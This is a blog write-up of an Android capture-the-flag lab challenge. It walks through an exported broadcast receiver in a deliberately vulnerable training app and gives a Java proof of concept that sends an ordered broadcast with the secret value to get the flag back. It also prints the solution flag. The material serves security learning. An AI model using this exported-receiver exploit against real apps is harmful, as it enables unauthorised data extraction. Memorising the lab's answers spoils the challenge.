0xAnan's Dojo

Flag 17 - Receiver with response

2 min read

Static Analysis

AndroidManifest.xml

Upon inspecting the Flag17Receiver in the AndroidManifest.xml file we see the following

<receiver  
	android:name="io.hextree.attacksurface.receivers.Flag17Receiver"  
	android:enabled="true"  
	android:exported="true"/>

A normal receiver nothing interesting, let’s inspect the Flag17Receiver class

Flag17Receiver Class

public class Flag17Receiver extends BroadcastReceiver {  
    public static String FlagSecret = "give-flag-17";  
  
    @Override // android.content.BroadcastReceiver  
    public void onReceive(Context context, Intent intent) {  
        Log.i("Flag17Receiver.onReceive", Utils.dumpIntent(context, intent));  
        if (isOrderedBroadcast()) {  
            if (intent.getStringExtra("flag").equals(FlagSecret)) {  
                success(context, FlagSecret);  
                return;  
            }  
            Bundle bundle = new Bundle();  
            bundle.putBoolean("success", false);  
            setResult(0, "Flag 17 Completed", bundle);  
        }  
    }  
  
    private void success(Context context, String str) {  
        Flag17Activity flag17Activity = new Flag17Activity();  
        flag17Activity.f = new LogHelper(context);  
        flag17Activity.f.addTag(str);  
        flag17Activity.success(null, context);  
        Bundle bundle = new Bundle();  
        bundle.putBoolean("success", true);  
        bundle.putString("flag", flag17Activity.f.appendLog(flag17Activity.flag));  
        setResult(-1, "Flag 17 Completed", bundle);  
    }  
}

As we can see we only need to put send the flag extra with the correct value just like Flag16 challenge, The only difference here is it also sends the flag in the result so let’s create the POC for it!

Creating POC

Flag17.java

public class Flag17 extends AppCompatActivity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_flag17);
        getSupportActionBar().setTitle("Flag 17");
 
        // Define the receiver to handle the result of the ordered broadcast
        BroadcastReceiver resultReceiver = new BroadcastReceiver() {
            @Override
            public void onReceive(Context context, Intent intent) {
                Bundle extras = getResultExtras(true);
                String flag = extras.getString("flag");
                Log.i("Tensai-POC", "Flag 17 Result: " + flag);
            }
        };
 
        Button button = findViewById(R.id.button_flag17);
        button.setOnClickListener(v -> {
            Log.v("Tensai-POC", "Solving Flag 17");
            
            Intent intent = new Intent();
            intent.putExtra("flag", "give-flag-17");
            intent.setComponent(new ComponentName(
                    "io.hextree.attacksurface",
                    "io.hextree.attacksurface.receivers.Flag17Receiver"
            ));
 
            // Send ordered broadcast to get the flag back in resultReceiver
            sendOrderedBroadcast(intent, null, resultReceiver, null, RESULT_CANCELED, null, null);
        });
    }
}

Here we created a poc that sends the intent with the correct secret and also we implemented onReceive method for our broadcast to catch the flag from the result, Here’s our logs in logcat:

Flag

HXT{returned-result-ds82s}